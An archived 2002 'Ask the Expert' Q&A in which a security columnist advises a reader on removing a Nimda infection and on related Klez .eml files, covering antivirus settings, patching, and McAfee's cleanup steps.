Ask the Expert

Cleaning Nimda and identifying .eml file

The Nimda virus has infected my network. Norton Antivirus states that it only is placing the file in quarantine and not cleaning the virus. I also get numerous files with the same name and the suffix .eml on all of my servers. Is there any way I can trace where the virus is coming from? How do I get rid of it completely?

    Requires Free Membership to View

I feel your pain. Here are a few points first before I answer:

  • Antivirus should be running on all desktops and servers with logging.
  • Both desktop and server installs should be locked to only your specifications.
  • These installs should report all viruses to the main console or site.
  • Company policy should dictate no use of removalable media from outside the copmany without first scanning them.
  • Viruses should be deleted!!! Yes, delete them as to NOT spread them.
  • If these procedures were in place, you would know when and if a virus hit your network. The logging/alerts would be sent to you, then you would know where they are arriving into your network.

    Okay, now lets see if I can answer you:

  • Change the Norton configuration to "delete" all viruses and clean. Change every desktop and server in the company, no matter the length of time to accomlish this. I know one company that did all 10,000 desktops and servers in a weekend simply becuase they did not have remote management. It was that important due to loss of hours and data.

  • Check the patch levels of all Microsoft Devices (OS, ISS, SQL, Exhcange). Microsoft reports that if all your systems are patched, Nimda should die quickly.

  • Your .eml problem may be an Aliases problem related to the following: Klaz (F-Secure), TROJ_KLEZ.C (Trend), W32.Klez.D@mm (NAV), W32/Klez (Panda), W32/Klez.a@MM, W32/Klez.b@MM, W32/Klez.eml, W32/Klez@MM, Win32.Klez.D@mm (AVX)

  • Check www.mcafee.com for references to each of these. Here are specific instructions from McAfee:

    Removing the .eml threat requires patching vulnerable systems, disabling network shares, and using the latest DAT files. It can not be removed manually.

    Infected systems must:
    - Apply the patches
    - Close any network shares prior to cleaning
    - Exit any running applications
    - Stop a running IIS server
    - Scan and clean each drive
    - Restore the RICHED20.DLL and MMC.EXE files if they were overwritten by the virus and deleted by the scanner.

  • You may need to accomplish furhter work on the .eml issue. It may not or may be Nimda related. Since I do not have first hand access to your systems and have not see the logs or reports, I can only assume facts.

    Good luck!!


    This was first published in March 2002

  • There are Comments. Add yours.

     
    TIP: Want to include a code block in your comment? Use <pre> or <code> tags around the desired text. Ex: <code>insert code</code>

    REGISTER or login:

    Forgot Password?
    By submitting you agree to receive email from TechTarget and its partners. If you reside outside of the United States, you consent to having your personal data transferred to and processed in the United States. Privacy
    Sort by: OldestNewest

    Forgot Password?

    No problem! Submit your e-mail address below. We'll send you an email containing your password.

    Your password has been sent to: